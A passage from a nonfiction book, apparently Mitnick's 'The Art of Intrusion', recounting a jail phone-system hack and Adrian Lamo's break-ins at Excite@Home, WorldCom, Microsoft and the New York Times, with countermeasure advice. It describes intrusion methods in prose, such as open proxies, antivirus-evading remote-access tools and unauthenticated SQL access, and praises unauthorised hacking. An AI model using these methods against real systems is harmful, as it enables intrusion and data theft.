tones as you like.” He began exploring the voicemail system.
                        Chapter 4   Cops and Robbers                      85

  He was able to identify the system as a Meridian, a type he and Costa
were both very familiar with, and he programmed it so it would transfer
his calls to an outside line. “I set up a menu number eight, which the
automated voice announcement didn’t prompt for. Then I could dial a
local number, and a six-digit code I knew. From there I could call any-
where in the world.”
  Even though the phones were turned off at 8 P.M., the Public
Defenders line was always left on. “We would just play with the phones
all night and there’s nobody waiting to use them because they think
they’re turned off,” says Costa. “They just think you’re crazy, sitting
there with the phone. So, it just worked out perfectly.”
  While Costa was discovering how to make outside calls, Matt was also
using the telephone on his own unit at night to do some exploring of his
own. He located a “bridge number in an old loop” of a Pennsylvania tele-
phone company, which allowed both to call in on a phone company test
number and talk to each other.
  The two spent hours on the unmonitored phones talking to one
another. “We had the ability to discuss our case prior to our interviews.
That was handy, really handy,” says Costa. Matt added, “We would dis-
cuss forever what the other side was being told. We wanted to have every-
thing corroborated.”
  Word spread among the inmates that the two new kids were wizards
with the phones.

     Costa: I got kinda fat in there because other people were giving
     me their trays for free phone calls.
     Matt: I was starting to get skinny because I was nervous. I was
     sitting there with all the thugs and I didn’t like giving them all
     those calls.

  Sitting in jail and breaking the law by making illegal phone calls and
planning their stories in hopes of deceiving the prosecutors. To any
hacker, that’s just plain funny. For Matt and Costa, it meant risking more
charges being piled on top of the ones they were already facing.
  In the end, their efforts at collusion didn’t help. The facts were stacked
high against them, and this time they were in front of a judge who wasn’t
going to hand them just another slap on the wrist. They were each sen-
tenced to serve “a year and a day” in a federal facility, with credit for time
already served in the county jail. The extra “day” of prison time was of
substantial benefit to them. Under federal sentencing laws, that made
them eligible to be released up to 54 days earlier for good behavior.
 86                            The Art of Intrusion


  The two were held without bond for three and a half months, then
released on their own recognizance under a heavy set of restrictions until
the judge decided on a sentence. Don was right: no leniency this time.


Doing Time
Matt was sent to the Sheridan Camp in Oregon, while Costa went to
Boron Federal Prison Camp in California. “It was federal because we vio-
lated our terms of probation on a federal charge,” says Costa.
  Nevertheless, this wasn’t exactly “hard time” for either of them. As
Costa recalls:

      I knew I had it cushy. This was a prison camp that had a swim-
      ming pool. In the middle of the Mojave, that was kinda nice. We
      didn’t have a fence, just a yellow line in the sand. It was one of these
      places that, you know, had three senators down there. There was the
      guy that started a famous restaurant chain in there with me.

   Boron was the last federal institution with a pool, and Costa heard later
that a Barbara Walters television story had resulted in the pool being
filled in just after he was released. Personally I can understand not spend-
ing taxpayer money to put in a swimming pool when a new prison is
being built, but I can’t understand destroying one that already exists.
   At the Sheridan prison, Matt found out another inmate was a former
executive from Boeing. “He got in trouble for some type of embezzle-
ment or white collar crime.” It seemed somehow ironic.
   Costa and other Boron inmates were frequently driven half an hour
across the desert in a steaming prison bus to do menial labor at nearby
Edwards Air Force Base. “They put me in an army hangar where they had
a VAX server. I wasn’t even supposed to be near a computer.” He alerted
the sergeant. “I told him my story and he’s like, ‘Oh, go ahead.’” Costa
wasted no time getting acquainted with the military computer. “I was
getting on the IRC every day and chatting away while I was locked up. I
was downloading Doom at high speed. It was amazing, great!”
   At one point Costa was assigned to clean out a classified communications
van filled with sensitive electronics. “I just couldn’t believe they were let-
ting us do this.”
   On one level, their prison time sounds like a lark, almost a joke. It wasn’t.
Every month they spent inside was a month of life wasted, a month of
education missed, a month apart from people they cared about and
wanted to be with. Every morning a prisoner starts his day wondering if
today will bring a fistfight to defend himself or his property. Jail and
prison can be terrifying.
                        Chapter 4   Cops and Robbers                    87


What They’re Doing Today
A decade after they were released, both seem to be settled into more tra-
ditional lives. Matt is currently working for a large company in San Jose
as a Java application developer. Costa has his own company and sounds
quite busy, “setting up digital surveillance systems and distributed audio
clients (slimdevices) for businesses.” He’s found work that he’s well
suited for; people bored with their jobs would be envious that he is, he
says, “enjoying every minute.”


INSIGHT
It seems amazing in today’s world that hackers still find it so easy to
saunter into so many corporate Web sites. With all the stories of break-ins,
with all the concern about security, with dedicated, professional security
people on staff or consulting to companies large and small, it’s shocking
that this pair of teenagers were skillful enough to find their way into the
computers of a federal court, a major hotel chain, and Boeing Aircraft.
   Part of the reason this happens, I believe, is that many hackers follow a
path like I did, spending an inordinate amount of time learning about
computer systems, operating system software, applications programs,
networking, and so on. They are largely self-taught but also partly men-
tored in an informal but highly effective “share the knowledge” tutoring
arrangement. Some barely out of junior high have put in enough time
and gained enough knowledge in the field that they qualify for a Bachelor
of Science in Hacking degree. If MIT or Cal Tech awarded such a degree,
I know quite a few I would nominate to sit for the graduation exam.
   No wonder so many security consultants have a secret past as a black-hat
hacker (including more than a couple whose stories appear in these pages).
Compromising security systems requires a particular type of mindset that
can thoughtfully analyze how to cause the security to fail. Anybody trying
to enter the field strictly on the basis of classroom learning would require
a lot of hands-on experience, since he or she would be competing with
consultants who started their education in the subject at age 8 or 10.
   It may be painful to admit, but the truth is that everyone in the security
field has a lot to learn from the hackers, who may reveal weakness in the
system in ways that are embarrassing to acknowledge and costly to address.
They may break the law in the process, but they perform a valuable serv-
ice. In fact, many security “professionals” have been hackers in the past.
   Some will read this and put it down to Kevin Mitnick, the one-time
hacker, simply defending today’s generation of hackers. But the truth is
that many hacker attacks serve the valuable purpose of exposing weak-
nesses in a company’s security. If the hacker has not caused any damage,
 88                          The Art of Intrusion


committed a theft, or launched a denial-of-service attack, has the com-
pany suffered from the attack, or benefited by being made to face up to
their vulnerabilities?


COUNTERMEASURES
Ensuring proper configuration management is a critical process that
should not be ignored. Even if you properly configure all hardware and
software at the time of installation and you keep up-to-date on all essen-
tial security patches, improperly configuring just a single item can create
a crack in the wall. Every organization should have an established proce-
dure for ensuring that IT personnel who install new computer hardware
and software, and telecom personnel who install telephone services, are
thoroughly trained and regularly reminded, if not tested, on making cer-
tain security is ingrained in their thinking and behavior.
  At the risk of sounding — here and elsewhere — as if we’re promoting
our earlier book, The Art of Deception (Wiley Publishing, Inc., 2002) pro-
vides a plan for employee computer-security awareness training. Systems
and devices should be security tested prior to being put into production.
  I firmly believe that relying only on static passwords should be a prac-
tice of the past. A stronger form of security authentication, using some
kind of physical device such as time-based token or a reliable biometric,
should be used in conjunction with a strong personal password —
changed often — to protect systems that process and store valuable infor-
mation. Using a stronger form of authentication doesn’t guarantee it
can’t be hacked, but at least it raises the bar.
  Organizations that continue to use only static passwords need to pro-
vide training and frequent reminders or incentives that will encourage
safe password practices. Effective password policy requires users to con-
struct secure passwords containing at least one numeral, and a symbol or
mixed-case character, and to change them periodically.
  A further step requires making certain that employees are not catering to
“lazy memory” by writing down the password and posting it on their mon-
itor or hiding it under the keyboard or in a desk drawer — places any expe-
rienced data thief knows to look first. Also, good password practice requires
never using the same or similar password on more than one system.


THE BOTTOM LINE
Let’s wake up, people. Changing default settings and using strong pass-
words might stop your business from being victimized.
                       Chapter 4   Cops and Robbers                    89

  But this isn’t just user stupidity. Software manufacturers have not made
security a higher priority than interoperability and functionality. Sure,
they put careful guidelines in the user guides and the installation instruc-
tions. There’s an old engineering saying that goes, “When all else fails,
read the instructions.” Obviously, you don’t need an engineering degree
to follow that bad rule.
  It’s about time that manufacturers began getting wise to this perennial
problem. How about hardware and software manufacturers starting to
recognize that most people don’t read the documentation? How about
providing a warning message about activating the security or changing
the default security settings that pops up when the user is installing the
product? Even better, how about making it so the security is enabled by
default? Microsoft has done this recently — but not until late 2004, in
the security upgrade to Windows XP Professional and Home editions
with their release of “Service Pack 2,” in which the built-in firewall is
turned on by default. Why did it take so long?
  Microsoft and other operating system manufactures should have
thought about this years ago. A simple change like this throughout the
industry might make cyberspace a little safer for all of us.
            Chapter 5
         The Robin Hood Hacker
[Hacking] has always been for me less about technology and more about
religion.
                                                       — Adrian Lamo




H
              acking is a skill. Anyone can acquire this skill through self-
              education. In my personal view, hacking is a creative art —
              figuring out ways to circumvent security in clever ways, just
like lock-picking enthusiasts try to circumvent locking mechanisms for
the pure entertainment value. Individuals could hack without breaking
the law.
   The distinction lies on whether the owner has given permission to the
hacker to attempt to infiltrate the owner’s computer systems. There are
many ways people can hack, albeit with permission of the “victim.” Some
knowingly break the law but are never caught. Some run the risk and
serve prison time. Virtually all hide their identities behind a moniker —
the online version of a nickname.
   Then there are the few like Adrian Lamo, who hack without masking
their identity and when they find a flaw in some organization’s security,
tell them about it. These are the Robin Hoods of hacking. They should
not be incarcerated but celebrated. They help companies wake up before
some hacker of the malicious type does the company serious damage.
   The list of organizations that the federal government says Adrian Lamo
has hacked into is, to say the least, impressive. It includes Microsoft,
Yahoo!, MCI WorldCom, Excite@Home, and telephone companies SBC,
Ameritech, and Cingular.1And the venerable New York Times.


                                    91
 92                          The Art of Intrusion


 Okay, yes, Adrian has cost companies money, but not nearly as much
money as the prosecutors claimed.


Rescue
Adrian Lamo was not a typical “let’s hang out at the mall” kind of teen.
Late one night, for example, he and friends were exploring a large aban-
doned industrial complex located on some river banks. With no particular
agenda in mind, they wandered through a vast, decrepit plant and quickly
became lost. It was about two in the morning before they found their way
out of the maze. As they crossed a defunct railroad line alongside tomb-
stones of rusting industrial machinery, Adrian heard faint cries. Though
his friends just wanted to get out of there, Adrian’s curiosity was piqued.
  Following the plaintive sound brought him to a dirty storm drain. The
faint light was just enough to see into its dark recesses, where a tiny kit-
ten was trapped in the bottom, yowling for all its worth.
  Adrian called directory assistance on his cell phone for the number of
the police department. Just then a police cruiser’s spotlight blinded the
group.
  The guys were dressed in what Adrian describes as “urban exploration
gear — you know, gloves and dirty over-clothes. Not the sort of clothing
that inspires confidence and goodwill with law enforcement.” Adrian also
believes that as a teenager, he looked somewhat suspicious, and “We may
or may not have had things on us that could have resulted in arrest,” he
says. Options raced through Adrian’s head; they could submit to a long
string of questions and possible arrest, run, or ... a plan came to him.

      I flagged them down and said, “Hey, there’s this kitten in the
      storm drain. I could sure use your help.” Fast forward two hours
      later, none of us has been searched — the suspicious circumstances
      forgotten.

  Two police cruisers and one animal control vehicle later, the bedrag-
gled kitten was lifted to safety in a net at the end of a long pole. The
police gave the kitten to Adrian, who took it home, cleaned it up, and
named it “Alibi.” His friends called it “Drano.”
  Later, Adrian reflected on the encounter. As somebody who doesn’t
believe in coincidence, he’s certain they’d all been exactly where they
were meant to be at the moment. He views his “almost transcendental”
computer experiences the same way: There are no accidents.
  It’s interesting that Adrian also sees the kitten ordeal as a parallel to
what hackers do. Words like “adapt,” “improvise,” and “intuition” come
                     Chapter 5   The Robin Hood Hacker                   93

to mind, all critical ingredients to successfully negotiating the many traps
and dead ends lurking in the Web’s back streets and alleyways.


Roots
Born in Boston, Adrian spent most of his childhood moving around New
England before the family settled in Washington, DC. His father, a native
Colombian, writes children’s stories and does Spanish/English transla-
tions; Adrian considers him a natural-born philosopher. His mother
taught English but now manages the home. “They used to take me to
political rallies when I was a little kid. They raised me to question what I
see around me and made efforts to broaden my horizons.”
  Adrian doesn’t feel he fits a specific demographic profile, even though
he sees most hackers as falling into what he calls “white-bread middle-
class.” I once had the honor of meeting his parents and heard from them
that one of the reasons their son got involved in hacking was because he
had several favorite hackers who inspired him. It wasn’t mentioned, but
I get the impression from Adrian that one of those individuals might have
been me. His parents probably wanted to wring my neck.
  At the age of seven, Adrian began fooling around on his dad’s computer,
a Commodore 64. One day he became frustrated with a text adventure
game he was trying to play. Every option seemed to lead to a dead end.
He discovered that while loading a program on the computer, and before
executing the Run command, there was a way he could instruct the com-
puter to generate a listing of the game’s source code. The listing revealed
the answers he was looking for and he promptly won the game.
  It’s well known that the earlier a child begins learning a foreign language,
the more naturally he or she acquires it. Adrian thinks the same is true
about starting early on a computer. He theorizes the reason may be that
the brain has yet to become “hardwired,” with the neural net more mal-
leable, faster to acquire and accommodate, than it will be in adulthood.
  Adrian grew up immersed in the world of computers, seeing them as an
extension of reality and therefore readily manipulated. For him a com-
puter was not something one read about or poured over lengthy manu-
als to understand. It was not an external device, like a refrigerator or a
car, but a window — into himself. He decided that he organically
processed information the way a computer and its internal programs do.


Midnight Meetings
Of the corporate computer systems Adrian has hacked into, he considers
Excite@Home his ultimate “cloak-and-dagger” experience. The epic
started on a whim when somebody suggested he check out the @Home
 94                         The Art of Intrusion


site. As the clearinghouse for all cable Internet services in the United
States, Adrian was sure it was well protected and wouldn’t be worth his
time. But if he could successfully hack in, he would have access to key
information about every cable user in the country.
   Hackers are discovering these days that Google can be surprisingly help-
ful for uncovering likely targets of attack and revealing useful information
about them. Adrian kicks off a lot of his hacking forays by googling a set
of keywords that often lead to sites with some flaw in their configuration.
   So he plugged his laptop into an open network jack in the student
lounge of a Philadelphia university and called up the Excite@Home Web
page. The student lounge was a familiar kind of setting for him: Any loca-
tion used by lots of people, or a public Internet kiosk, or an open wireless
access point — connecting online from places like these provides an easy,
effective way for a hacker to mask his or her location. Uncovering the
true identity of someone who randomly uses public Internet access points
is extremely difficult.
   Adrian’s mindset is to get into the thought processes of the person who
designed the program or network he’s attacking, using his knowledge of
the patterns and standard practices that network architects commonly use
as his initial crutch. He is quite adept at exploiting misconfigured proxy
servers — dedicated computer systems that pass traffic between the inter-
nal network and “untrusted” networks like the Internet. The proxy
examines each connection request according to the rules it’s been given.
When a network administrator botches the job of configuring the com-
pany’s proxy servers, anyone who can connect to the proxy may be able
to tunnel through to the company’s supposedly secure internal network.
   To a hacker, such an open proxy is an invitation to mayhem because it
allows him to look as if he’s originating requests just like any legitimate
company employee: from inside the company’s own network.
   From that university student lounge, Adrian discovered a misconfig-
ured proxy that opened the door to the internal Web pages for various
departments of Excite@Home. Under the Help section of one, he posted
a question about trouble logging in. The response that came back bore
the URL address of a small part of the system designed to assist in resolv-
ing IT problems. By analyzing this URL, he was able to access other divi-
sions of the company that used the same technology. He was not asked
for authentication: The system had been designed on the assumption that
anyone who knew to call up addresses to these parts of the Web site must
be an employee or other authorized person — a shaky premise so wide-
spread that it has a nickname, “security through obscurity.”
   For the next step, he visited a site popular with cyberspace explorers,
Netcraft.com. Adrian randomly entered partial domain names, such as
                     Chapter 5   The Robin Hood Hacker                     95

Netcraft returned a list of Excite@Home servers, showing them as Solaris
machines running the Apache Web server software.
  As Adrian explored, he discovered that the company’s network opera-
tions center offered a technical support system that allowed authorized
employees to read details of customers requesting assistance — “Help! I
can’t access my account,” or whatever. The employee would sometimes
ask the customer to provide his or her username and password — safe
enough because this was all behind the corporate firewall; the information
would be included on the trouble ticket.
  What Adrian found was, he says, “eye-opening.” The treasures
included tickets that contained login and password information for cus-
tomers, details on the process for handling trouble tickets, and com-
plaints from internal users about computer problems they had been
having. He also found a script for generating an “authentication cookie”
that would allow a technician to authenticate as any account holder, to
troubleshoot a problem without requiring the customer’s password.
  One memo on a ticket caught Adrian’s attention. It showed the case of
a customer who more than a year earlier had asked for help with refer-
ence to personal information, including credit card numbers, stolen by
someone on an Internet Relay Chat service. The internal memo stated
that the “techs” (technicians) decided it wasn’t their problem and didn’t
bother responding. They basically blew the poor guy off. Posing as a
company technician, Adrian called the man at home and said, “Hey, I’m
not really supposed to be working this ticket, but I was curious if you ever
got a response from us.” The man said he’d never heard a single word.
Adrian promptly forwarded him the correct answer and all the internal
documentation and discussion regarding his unresolved ticket.

     I got a sense of satisfaction out of that because I want to believe
     in a universe where something so improbable as having your
     database stolen by somebody on Internet Relay Chat can be
     explained a year later by an intruder who has compromised the
     company you first trusted to help you.

  About this time, the open proxy that had given him access stopped
working. He wasn’t sure why, but he could no longer get in. He started
looking for another way. The approach he came up with was, in his
words, “entirely novel.”
  His first toehold came from doing what’s called a reverse DNS lookup —
using an IP address to find out the corresponding hostname. (If you enter
a request in your browser to go to the site for www.defensivethinking.
com, the request goes to a Domain Name Server (DNS), which translates
the name into an address that can be used on the Internet to route your
 96                          The Art of Intrusion


request, in this case 209.151.246.5. The tactic Adrian was using reverses
this process: The attacker enters an IP address and is provided the
domain name of the device that the address belongs to.)
   He had many addresses to go through, most of which provided noth-
ing of interest. Eventually, though, he found one with a name in the form
of dialup00.corp.home.net, and several others that also began “dialup.”
He assumed these were hosts used by employees on the road, for dialing
in to the corporate network.
   He soon discovered that these dial-up numbers were being used by
employees still working on computers running older versions of the oper-
ating system — versions as ancient as Windows 98. And several of the dial-
up users had open shares, which allowed remote access to certain
directories, or the entire hard drive, with no read or write password.
Adrian realized that he could make changes to the operating system
startup scripts by copying files to the shares, so they would run commands
of his choosing. After writing over particular startup files with his own ver-
sion, he knew he would have to wait until the system was rebooted before
his commands would be executed. But Adrian knows how to be patient.
   The patience eventually paid off, and Adrian moved on to the next step:
installing a Remote Access Trojan (a “RAT”). But to do this, he doesn’t
reach for any of the commonly available hacker-developed Trojans, the
kind other intruders use for malicious purposes. Antivirus programs, so
highly popular these days, are designed to recognize common backdoor
and Trojan programs, and quarantine them instantly. As a way around
this, Adrian finds a legitimate tool designed for use by network and sys-
tem administrators — commercial remote-administration software,
which he modifies slightly so it’s invisible to the user.
   While antivirus products look for the kinds of remote-access software
known to be used by the hacker underground, they do not look for
remote-access software developed by other commercial software compa-
nies, on the assumption that these products are being used legitimately
(and also, I suppose, because the Developer X software company might
sue if the antivirus software treated its product as malicious and blocked
it). Personally I believe this is a bad idea; the antivirus products should
alert the user to any product that could be used maliciously and let the
user decide whether it has been legitimately installed. Taking advantage
of this loophole, Adrian is frequently able to install “legitimate” RATs
that subvert the detection of antivirus programs.
   Once he had successfully installed the RAT on the @Home employee’s
computer, he executed a series of commands that provided him informa-
tion on the active network connections to other computer systems. One
of these commands, “netstat,” showed him the network activity of an
employee who was at that moment currently connected to the @Home
                     Chapter 5   The Robin Hood Hacker                 97

intranet by dial-in, and revealed what computer systems in the internal
corporate network the person was using at the time.
   In order to show a sample of the data returned by netstat, I ran the pro-
gram to examine the operation of my own machine; in part, the output
listing looked like this:

  C:\Documents and Settings\guest>netstat -a

  Active Connections

  Proto      Local Address              Foreign Address
  State
  TCP        lockpicker:1411            64.12.26.50:5190
  ESTABLISHED
  TCP        lockpicker:2842            catlow.cyberverse.com:22
  ESTABLISHED
  TCP        lockpicker:2982            www.kevinmitnick.com:http
  ESTABLISHED

  The “Local Address” lists the name of the local machine (“lockpicker” was
at the time the name I was using for my computer) and the port number of
that machine. The “Foreign Address”shows the hostname or IP address of
the remote computer, and the port number to which a connection has been
made. For example, the first line of the report indicates that my computer
has established a connection to 64.12.26.50 on port 5190, the port com-
monly used for AOL Instant Messenger. “State” indicates the status of the
connection — “Established” if the connection is currently active,
“Listening” if the local machine is waiting for an incoming connection.
  The next line, including the entry “catlow.cyberverse.com,” provides
the hostname of the computer system that I was connected to. On the
last line, the entry “www.kevinmitnick.com:http” indicates that I was
actively connected to my personal Web site.
  The owner of the destination computer is not required to run services
on commonly known ports but can configure the computer to use non-
standard ports. For example, HTTP (Web server) is commonly run on
port 80, but the owner can change that to run a Web server on whatever
port he or she chooses. By listing the TCP connections of employees,
Adrian found that @Home employees were connecting to Web servers on
nonstandard ports.
  From information like this, Adrian was able to obtain IP addresses for
internal machines worth exploring for sensitive @Home corporate infor-
mation. Among other gems, he found a database of names, e-mail
addresses, cable modem serial numbers, current IP addresses, even what
operating system the customer’s computer was reported as running, for
every one of the company’s nearly 3 million broadband subscribers.
 98                          The Art of Intrusion


   This one was “an exotic type of attack” in Adrian’s description, because
it involved hijacking a connection from an off-site employee dialing into
the network.
   Adrian considers it a fairly simple process to be trusted by a network.
The difficult part — which took a month of trial and error — was com-
piling a detailed map of the network: what all the different parts are, and
how they relate to one another.
   The lead network engineer for Excite@Home was a man Adrian had fed
information to in the past and sensed could be trusted. Deviating from
his usual pattern of using an intermediary to pass information to a com-
pany he had penetrated, he called the engineer directly and explained he
had discovered some critical weaknesses in the company’s network. The
engineer agreed to meet, despite the late hour that Adrian proposed.
They sat down together at midnight.
   “I showed him some of the documentation I had accrued. He called
their security guy and we met him at the [Excite@Home] campus at
around 4:30 in the morning.” The two men went over Adrian’s materi-
als and questioned him about exactly how he had broken in. Around six
in the morning, when they were finishing up, Adrian said he’d like to see
the actual proxy server that had been the one he had used to gain access.

      We tracked it down. And they said to me, “How would you secure
      this machine?”

  Adrian already knew the server wasn’t being used for any crucial func-
tion, that it was just a random system.

      I pulled out my pocketknife, one of those snazzy one-handed little
      openers. And I just went ahead and cut the cable and said, “Now
      the machine’s secure.”
      They said, “That’s good enough.” The engineer wrote out a note
      and pasted it to the machine. The note said, “Do not reattach.”

  Adrian had discovered access to this major company as a result of a single
machine that had probably long ago ceased to have a needed function, but
no one had ever noticed or bothered to remove it from the network. “Any
company,” Adrian says, “will have just tons of machines sitting around, still
connected but not being used.” Every one is a potential for break-in.


MCI WorldCom
As he has with so many other networks before, it was once again by
attacking the proxy servers that Adrian found the keys to WorldCom’s
                    Chapter 5   The Robin Hood Hacker                   99

kingdom. He began the search using his favorite tool to navigate com-
puters, a program called ProxyHunter, which locates open proxy servers.
With that tool running from his laptop, he scanned WorldCom’s corpo-
rate Internet address space, quickly identifying five open proxies — one
hiding in plain view at a URL ending in wcom.com. From there, he
needed only to configure his browser to use one of the proxies and he
could surf WorldCom’s private network as easily as any employee.
   Once inside, he found other layers of security, with passwords required
for access to various intranet Web pages. Some people, I’m sure, will find
it surprising how patient an attacker like Adrian is willing to be, and how
many hours they’re willing to devote in the determined effort to con-
quer. Two months later, Adrian finally began to make inroads.
   He had gained access to WorldCom’s Human Resources system, giving
him names and matching social security numbers for all of the company’s
86,000 employees. With this information and a person’s birth date (he
swears by anybirthday.com), he had the ability to reset an employee’s
password, and to access the payroll records, including information such
as salary and emergency contacts. He could even have modified the direct
deposit banking instructions, diverting paychecks for many employees to
his own account. He wasn’t tempted, but observed that “a lot of people
would be willing to blow town for a couple hundred thousand dollars.”


Inside Microsoft
At the time of our interview, Adrian was awaiting sentencing on a variety
of computer charges; he had a story to tell about an incident he had not
been charged with but that was nonetheless included in the information
released by the federal prosecutor. Not wanting any charges added to those
already on the prosecutor’s list, he felt compelled to be circumspect in
telling us a story about Microsoft. Tongue firmly in cheek, he explained:

     I can tell you what was alleged. It was alleged that there was a
     web page which I allegedly found that allegedly required no
     authentication, had no indication that [the information was]
     proprietary, had absolutely nothing except for a search menu.

  Even the king of software companies doesn’t always get its computer
security right.
  Entering a name, Adrian “allegedly” realized he had the details of a
customer’s online order. The government, Adrian says, described the site
as storing purchase and shipping information on everybody who had ever
ordered a product online from the Microsoft Web site, and also contain-
ing entries about orders where credit cards had been declined. All of this
100                         The Art of Intrusion


would be embarrassing if the information ever became available to any-
one outside the company.
  Adrian gave details of the Microsoft security breach to a reporter he
trusted at the Washington Post, on his usual condition that nothing would
be published until the breach had been corrected. The reporter relayed
the details to Microsoft, where the IT people did not appreciate learning
of the break-in. “Microsoft actually wanted to bring charges,” Adrian
says. “They supplied a large damage figure — an invoice for $100,000.”
Someone at the company may later have had second thoughts about the
matter. Adrian was subsequently told that Microsoft had “lost the
invoice.” The accusation of the break-in remained a part of the record,
but with no dollar amount connected. (Judging from the newspaper’s
online archives, the editors of the Post did not consider the incident to be
newsworthy, despite Microsoft being the target and despite the role of
one of their own journalists in this story. Which makes you wonder.)


A Hero but Not a Saint:
The New York Times Hack
Adrian sat reading the New York Times Web site one day, when he sud-
denly had “a flash of curiosity” about whether he might be able to find a
way of breaking into the newspaper’s computer network. “I already had
access to the Washington Post,” he said, but admitted that the effort had
not been fruitful: He “didn’t find anything much interesting.”
   The Times seemed as if it would pose a heightened challenge, since they
had likely become prickly on the matter of security following a very pub-
lic and embarrassing hack a few years before, when a group called HFG
(“Hacking for Girlies”) defaced their Web site. The defacers criticized
Times’ technology scribe John Markoff for the stories he had written
about me, stories that had contributed to my harsh treatment by the
Justice Department.
   Adrian went online and began to explore. He first visited the Web site
and quickly found that it was outsourced, hosted not by the Times itself
but by an outside ISP. That’s a good practice for any company: It means
that a successful break-in to the Web site does not give access to the cor-
porate network. For Adrian, it meant he’d have to work a little harder to
find a way in.
   “There is no checklist for me,” Adrian says of his approach to break-
ins. But “when I’m doing a recon, I’m careful to gather information by
querying other sources.” In other words, he does not begin by immedi-
ately probing the Web site of the company he’s attacking, since this could
create an audit trail possibly leading back to him. Instead, valuable
research tools are available, free, at the American Registry for Internet
                      Chapter 5   The Robin Hood Hacker                     101

Numbers (ARIN), a nonprofit organization responsible for managing the
Internet numbering resources for North America.
  Entering “New York Times” in the Whois dialog box of arin.net brings
up a listing of data looking something like this:

  New York Times (NYT-3)
  NEW YORK TIMES COMPANY (NYT-4)
  New York Times Digital (NYTD)
  New York Times Digital (AS21568) NYTD 21568
  NEW YORK TIMES COMPANY NEW-YORK84-79 (NET-12-160-79-0-1)
  12.160.79.0 - 12.160.79.255
  New York Times SBC068121080232040219 (NET-68-121-80-232-1)
  68.121.80.232 - 68.121.80.239
  New York Times Digital PNAP-NYM-NYT-RM-01 (NET-64-94-185-0-
  1) 64.94.185.0 - 64.94.185.255

   The groups of four numbers separated by periods are IP addresses, which
can be thought of as the Internet equivalent of a mailing address of house
number, street, city, and state. A listing that shows a range of addresses (for
example, 12.160.79.0 - 12.160.79.255) is referred to as a netblock.
   He next did a port search on a range of addresses belonging to the New
York Times and sat back while the program scanned through the
addresses looking for open ports, hoping it would identify some interest-
ing systems he could attack. It did. Examining a number of the open
ports, he discovered that here, too, were several systems running mis-
configured open proxies — allowing him to connect to computers on the
company’s internal network.
   He queried the newspaper’s Domain Name Server (DNS), hoping to
find an IP address that was not outsourced but instead internal to the
Times, without success. Next he tried to extract all the DNS records for the
nytimes.com domain. After striking out on this attempt as well, he went
back to the Web site and this time had more success: he found a place on
the site that offered public visitors a list of the e-mail addresses for all Times
staffers who were willing to receive messages from the public.
   Within minutes he had an e-mail message from the newspaper. It wasn’t
the list of reporter’s e-mails he had asked for but was valuable anyway. The
header on the e-mail revealed that the message came from the company’s
internal network and showed an IP address that was unpublished. “People
don’t realize that even an e-mail can be revealing,” Adrian points out.
   The internal IP address gave him a possible opening. Adrian’s next step
was to begin going through the open proxies he had already found, man-
ually scanning the IP addresses within the same network segment. To
make the process clear, let’s say the address was 68.121.90.23. While most
attackers doing this would scan the netblock of this address by starting
102                          The Art of Intrusion


with 68.121.90.1 and continuing incrementally to 68.121.90.254,
Adrian tried to put himself in the position of a company IT person set-
ting up the network, figuring that the person’s natural tendency would
be to choose round numbers. So his usual practice was to begin with the
lower numbers — .1 through .10., and then go by tens — .20, .30, and
so on.
   The effort didn’t seem to be producing very much. He found a few
internal Web servers, but none that were information-rich. Eventually he
came across a server that held an old, no longer used Times intranet site,
perhaps decommissioned when the new site was put into production and
since forgotten. He found it interesting, read through it, and discovered
a link that was supposed to go to an old production site but turned out
instead to take him to a live production machine.
   To Adrian, this was the Holy Grail. The situation began to look even
brighter when he discovered that this machine stored training materials
for teaching employees how to use the system, something akin to a stu-
dent flipping through a thin CliffsNotes for Dickens’s Great Expectations
instead of reading the whole novel and working out the issues for herself.
   Adrian had broken into too many sites for him to feel any particular emo-
tion about his success at this stage, but he was making more progress than
he could have expected. And it was about to get better. He soon discovered
a built-in search engine for employees to use in finding their way around the
site. “Often,” he says, “system administrators don’t configure these prop-
erly, and they allow you to do searches that should be prohibited.”
   And that was the case here, providing what Adrian referred to as “the
coup de grace.” Some Times systems administrator had placed a utility in
one of the directories that allows doing what’s called a free-form SQL
query. SQL, the Structured Query Language, is a scripting language for
most databases. In this case, a pop-up dialog box appeared that allowed
Adrian to enter SQL commands with no authentication, meaning that he
was able to search virtually any of the databases on the system and extract
or change information at will.
   He recognized that the device where the mail servers lived was running
on Lotus Notes. Hackers know that older versions of Notes allow a user
to browse all other databases on that system, and this part of the Times
network was running an older version. The Lotus Notes database that
Adrian had stumbled onto gave him “the biggest thrill, because they
included everyone right down to every newsstand owner, the amounts
they made, and their socials,” slang for social security numbers. “There
was also subscriber information, as well as anybody who’d ever written to
complain about service or make inquiries.”
                     Chapter 5   The Robin Hood Hacker                     103

  Asked what operating system the Times was running, Adrian answered
that he doesn’t know. “I don’t analyze a network that way,” he explained.

     It’s not about the technology, it’s about the people and how they
     configure networks. Most people are very predictable. I often find
     that people build networks the same way, over and over again.
     Many eCommerce sites make this mistake. They assume people
     will make entries in the proper order. No one assumes the user will
     go out of order.

  Because of this predictability, a knowledgeable attacker could place an
order at an online Web site, go through the purchase process to the point
where his or her data has been verified, then back up and change the
billing information. The attacker gets the merchandise; somebody else
gets the credit card charge. (Though Adrian explained the procedure in
detail, he specifically asked us not to give a full enough description that
would allow others to do this.)
  His point was that systems administrators routinely fail to think with
the mind of an attacker, making an attacker’s job far easier than it need
be. And that’s what explains his success with his next step in penetrating
the Times’ computer network. The internal search engine should not
have been able to index the entire site, but it did. He found a program
that brought up a SQL form that allowed him control over the databases,
including typing in queries for extracting information. He then needed
to find out the names of the databases on that system, looking for ones
that sounded interesting. In this way he found a database of very great
interest: It contained a table of the entire username and password list for
what appeared to be every employee of the New York Times.
  Most of the passwords, it turned out, were simply the last four digits of
the person’s social security number. And the company did not bother
using different passwords for access to areas containing especially sensi-
tive information — the same employee password worked everywhere on
the system. And for all he knows, Adrian said, the passwords at the Times
are no more secure today than they were at the time of his attack.

     From there, I was able to log back into the Intranet and gain
     access to additional information. I was able to get to the news
     desk and log in as the news manager, using his password.

  He found a database listing every person being held by the United
States on terrorism charges, including people whose names had not been
made public. Continuing to explore, he located a database of everyone
who’d ever written an op-ed piece for the Times. This totaled thousands
104                          The Art of Intrusion


of contributors and disclosed addresses, phone numbers, and social secu-
rity numbers. He did a search for “Kennedy” and found several pages of
information. The database listed contact information on celebrities and
public figures ranging from Harvard professors to Robert Redford and
Rush Limbaugh.
   Adrian added his own name and cell phone number (based in a north-
ern California area code, the number is “505-HACK”). Obviously count-
ing on the paper never figuring out that the listing had been planted there
and apparently hoping that some reporter or op-ed page editor might be
taken in, he listed his fields of expertise as “computer hacking/
security and communications intelligence.”
   Okay, inappropriate, perhaps inexcusable. Yet even so, to me the action
